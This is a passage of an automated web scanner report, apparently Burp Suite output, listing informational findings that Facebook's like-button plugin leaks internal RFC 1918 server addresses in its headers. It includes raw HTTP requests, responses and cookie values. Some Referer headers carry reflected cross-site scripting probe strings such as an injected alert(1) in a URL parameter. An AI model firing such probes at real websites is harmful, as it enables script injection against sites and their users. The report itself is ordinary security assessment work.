X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.157.47
X-Cnection: close
Date: Sat, 15 Oct 2011 15:17:56 GMT
Content-Length: 25881

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.31. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.147.59
X-Cnection: close
Date: Sat, 15 Oct 2011 15:26:47 GMT
Content-Length: 23557

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.32. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.24.43
X-Cnection: close
Date: Sat, 15 Oct 2011 15:28:03 GMT
Content-Length: 23557

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.33. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df552a9d44%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff34f102e6%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.50.31
X-Cnection: close
Date: Sat, 15 Oct 2011 15:18:14 GMT
Content-Length: 25367

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.34. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.153.59
X-Cnection: close
Date: Sat, 15 Oct 2011 15:27:57 GMT
Content-Length: 23557

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.35. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df552a9d44%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff34f102e6%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df552a9d44%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff34f102e6%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.157.39
X-Cnection: close
Date: Sat, 15 Oct 2011 15:18:15 GMT
Content-Length: 25733

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.36. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.143.65
X-Cnection: close
Date: Sat, 15 Oct 2011 15:25:47 GMT
Content-Length: 23557

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.37. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/products/tomoye.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.143.49
X-Cnection: close
Date: Sat, 15 Oct 2011 15:26:47 GMT
Content-Length: 23385

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.38. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b38f1ea8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff3ce6901c4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b38f1ea8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff3ce6901c4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.34
X-Cnection: close
Date: Sat, 15 Oct 2011 14:44:54 GMT
Content-Length: 25737

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.39. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdc737db8d2fc1%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff14cdd90b8bc4a9%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Proxy-Connection: Keep-Alive
Cookie: datr=fCRBTg_ZngztwJJ8-42u7Bpc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.29.35
X-Cnection: close
Date: Sat, 15 Oct 2011 15:27:57 GMT
Content-Length: 25772

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.40. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b38f1ea8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff3ce6901c4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.50.34
X-Cnection: close
Date: Sat, 15 Oct 2011 14:44:53 GMT
Content-Length: 25204

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.41. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.141.43
X-Cnection: close
Date: Sat, 15 Oct 2011 15:26:27 GMT
Content-Length: 23557

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.42. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2Fceid.173834100%2FStyleVersion.7%2Fcename.ProductDetails%2FcategoryID.57066300%2F_s_icmp.CG4E7A594%2FparentCategoryID.57065700%2FproductID.231860300%2FEnv.BASE%2FStyleID.39233700%2FESIHC.65f38917%2FCurrency.USD&layout=button_count&show_faces=false&width=150&action=recommend&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2Fceid.173834100%2FStyleVersion.7%2Fcename.ProductDetails%2FcategoryID.57066300%2F_s_icmp.CG4E7A594%2FparentCategoryID.57065700%2FproductID.231860300%2FEnv.BASE%2FStyleID.39233700%2FESIHC.65f38917%2FCurrency.USD&layout=button_count&show_faces=false&width=150&action=recommend&font=arial&colorscheme=light&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.51
X-Cnection: close
Date: Sat, 15 Oct 2011 14:30:53 GMT
Content-Length: 24177

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.43. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2Fceid.173834100%2FStyleVersion.7%2Fcename.ProductDetails%2FcategoryID.57066300%2F_s_icmp.CG4E7A594%2FparentCategoryID.57065700%2FproductID.231860300%2FEnv.BASE%2FStyleID.39233700%2FESIHC.65f38917%2FCurrency.USD&layout=button_count&show_faces=false&width=150&action=recommend&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.50
X-Cnection: close
Date: Sat, 15 Oct 2011 14:30:52 GMT
Content-Length: 23847

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.44. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.8.83
X-Cnection: close
Date: Sat, 15 Oct 2011 15:27:36 GMT
Content-Length: 23378

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.45. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2Fceid.173834100%2FStyleVersion.7%2Fcename.ProductDetails%2FcategoryID.57066300%2F_s_icmp.CG4E7A594%2FparentCategoryID.57065700%2FproductID.231860300%2FEnv.BASE%2FStyleID.39233700%2FESIHC.65f38917%2FCurrency.USD&layout=button_count&show_faces=false&width=150&action=recommend&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
